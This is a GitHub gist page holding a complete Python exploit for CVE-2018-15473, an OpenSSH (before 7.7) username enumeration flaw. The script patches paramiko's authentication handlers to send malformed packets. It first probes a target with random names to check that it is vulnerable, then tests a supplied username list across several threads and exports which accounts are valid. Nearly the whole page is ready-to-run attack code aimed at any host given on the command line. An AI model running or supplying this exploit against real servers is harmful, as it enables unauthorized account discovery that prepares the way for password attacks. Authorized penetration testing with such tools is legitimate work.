Last active
August 24, 2022 02:01
-
-
Save pdelteil/d96f02a87d9b9d6ec7d44e7d8cbc0ce5 to your computer and use it in GitHub Desktop.
CVE-2018-15473
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
########################################################################### | |
# ____ _____ _____ _ _ # | |
# / __ \ / ____/ ____| | | | # | |
# | | | |_ __ ___ _ __ | (___| (___ | |__| | # | |
# | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | # | |
# | |__| | |_) | __/ | | |____) |___) | | | | # | |
# \____/| .__/ \___|_| |_|_____/_____/|_| |_| # | |
# | | Username Enumeration # | |
# |_| # | |
# # | |
########################################################################### | |
# Exploit: OpenSSH Username Enumeration Exploit (CVE-2018-15473) # | |
# Vulnerability: CVE-2018-15473 # | |
# Affected Versions: OpenSSH version < 7.7 # | |
# Author: Justin Gardner, Penetration Tester @ SynerComm AssureIT # | |
# Github: https://github.com/Rhynorater/CVE-2018-15473-Exploit # | |
# Email: [email protected] # | |
# Date: August 20, 2018 # | |
########################################################################### | |
import argparse | |
import logging | |
import paramiko | |
import multiprocessing | |
import socket | |
import string | |
import sys | |
import json | |
from random import randint as rand | |
from random import choice as choice | |
# store function we will overwrite to malform the packet | |
old_parse_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] | |
# list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target | |
# with these 3 random usernames (there is an almost 0 possibility that they can be real ones) | |
random_username_list = [] | |
# populate the list | |
for i in range(3): | |
user = "".join(choice(string.ascii_lowercase) for x in range(rand(15, 20))) | |
random_username_list.append(user) | |
# create custom exception | |
class BadUsername(Exception): | |
def __init__(self): | |
pass | |
# create malicious "add_boolean" function to malform packet | |
def add_boolean(*args, **kwargs): | |
pass | |
# create function to call when username was invalid | |
def call_error(*args, **kwargs): | |
raise BadUsername() | |
# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler | |
def malform_packet(*args, **kwargs): | |
old_add_boolean = paramiko.message.Message.add_boolean | |
paramiko.message.Message.add_boolean = add_boolean | |
result = old_parse_service_accept(*args, **kwargs) | |
#return old add_boolean function so start_client will work again | |
paramiko.message.Message.add_boolean = old_add_boolean | |
return result | |
# create function to perform authentication with malformed packet and desired username | |
def checkUsername(username, tried=0): | |
sock = socket.socket() | |
sock.connect((args.hostname, args.port)) | |
# instantiate transport | |
transport = paramiko.transport.Transport(sock) | |
try: | |
transport.start_client() | |
except paramiko.ssh_exception.SSHException: | |
# server was likely flooded, retry up to 3 times | |
transport.close() | |
if tried < 4: | |
tried += 1 | |
return checkUsername(username, tried) | |
else: | |
print('[-] Failed to negotiate SSH transport') | |
try: | |
transport.auth_publickey(username, paramiko.RSAKey.generate(1024)) | |
except BadUsername: | |
return (username, False) | |
except paramiko.ssh_exception.AuthenticationException: | |
return (username, True) | |
#Successful auth(?) | |
raise Exception("There was an error. Is this the correct version of OpenSSH?") | |
# function to test target system using the randomly generated usernames | |
def checkVulnerable(): | |
vulnerable = True | |
for user in random_username_list: | |
result = checkUsername(user) | |
if result[1]: | |
vulnerable = False | |
return vulnerable | |
def exportJSON(results): | |
data = {"Valid":[], "Invalid":[]} | |
for result in results: | |
if result[1] and result[0] not in data['Valid']: | |
data['Valid'].append(result[0]) | |
elif not result[1] and result[0] not in data['Invalid']: | |
data['Invalid'].append(result[0]) | |
return json.dumps(data) | |
def exportCSV(results): | |
final = "Username, Valid\n" | |
for result in results: | |
final += result[0]+", "+str(result[1])+"\n" | |
return final | |
def exportList(results): | |
final = "" | |
for result in results: | |
if result[1]: | |
final+=result[0]+" is a valid user!\n" | |
else: | |
final+=result[0]+" is not a valid user!\n" | |
return final | |
# assign functions to respective handlers | |
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet | |
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error | |
# get rid of paramiko logging | |
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler()) | |
arg_parser = argparse.ArgumentParser() | |
arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address") | |
arg_parser.add_argument('--port', type=int, default=22, help="The target port") | |
arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used") | |
arg_parser.add_argument('--outputFile', type=str, help="The output file location") | |
arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location") | |
group = arg_parser.add_mutually_exclusive_group(required=True) | |
group.add_argument('--username', type=str, help="The single username to validate") | |
group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through") | |
args = arg_parser.parse_args() | |
def main(): | |
sock = socket.socket() | |
try: | |
sock.connect((args.hostname, args.port)) | |
sock.close() | |
except socket.error: | |
print('[-] Connecting to host failed. Please check the specified host and port.') | |
sys.exit(1) | |
# first we run the function to check if host is vulnerable to this CVE | |
if not checkVulnerable(): | |
# most probably the target host is either patched or running a version not affected by this CVE | |
print("Target host most probably is not vulnerable or already patched, exiting...") | |
sys.exit(0) | |
elif args.username: #single username passed in | |
result = checkUsername(args.username) | |
if result[1]: | |
print(result[0]+" is a valid user!") | |
else: | |
print(result[0]+" is not a valid user!") | |
elif args.userList: #username list passed in | |
try: | |
f = open(args.userList) | |
except IOError: | |
print("[-] File doesn't exist or is unreadable.") | |
sys.exit(3) | |
usernames = map(str.strip, f.readlines()) | |
f.close() | |
# map usernames to their respective threads | |
pool = multiprocessing.Pool(args.threads) | |
results = pool.map(checkUsername, usernames) | |
try: | |
if args.outputFile: | |
outputFile = open(args.outputFile, "w") | |
except IOError: | |
print("[-] Cannot write to outputFile.") | |
sys.exit(5) | |
if args.outputFormat=='json': | |
if args.outputFile: | |
outputFile.writelines(exportJSON(results)) | |
outputFile.close() | |
print("[+] Results successfully written to " + args.outputFile + " in JSON form.") | |
else: | |
print(exportJSON(results)) | |
elif args.outputFormat=='csv': | |
if args.outputFile: | |
outputFile.writelines(exportCSV(results)) | |
outputFile.close() | |
print("[+] Results successfully written to " + args.outputFile + " in CSV form.") | |
else: | |
print(exportCSV(results)) | |
else: | |
if args.outputFile: | |
outputFile.writelines(exportList(results)) | |
outputFile.close() | |
print("[+] Results successfully written to " + args.outputFile + " in List form.") | |
else: | |
print(exportList(results)) | |
else: # no usernames passed in | |
print("[-] No usernames provided to check") | |
sys.exit(4) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment